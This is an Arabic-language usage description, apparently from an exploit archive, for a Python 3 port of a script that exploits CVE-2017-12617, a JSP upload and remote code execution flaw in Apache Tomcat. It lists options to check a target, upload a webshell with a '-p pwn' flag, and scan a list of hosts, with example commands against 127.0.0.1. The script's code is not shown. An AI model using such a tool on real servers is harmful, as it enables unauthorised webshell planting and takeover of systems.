
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - تجاوز رفع ملفات JSP / تنفيذ الأوامر عن بُعد لـ Python3
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - تجاوز رفع JSP / تنفيذ التعليمات البرمجية عن بُعد لـ Python3
لقد أجريت بعض التعديلات على السكربت الأصلي ليكون متوافقًا مع Python 3!
إذا واجهت أي مشاكل أو أعطال، فلا تتردد في مراسلتي على البريد الإلكتروني [email protected] أو يمكنك مراسلتي أيضًا إذا أردت.
لا تحكم على بريدي الإلكتروني، فهو يُستخدم كبريد مؤقت
./cve-2017-12617.py [options]
الخيارات:
-u ,--url [::] فحص ما إذا كان عنوان URL الهدف معرضًا للثغرة
-p,--pwn [::] إنشاء webshell ورفعه
-l,--list [::] قائمة المضيفين
[+] الاستخدام:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt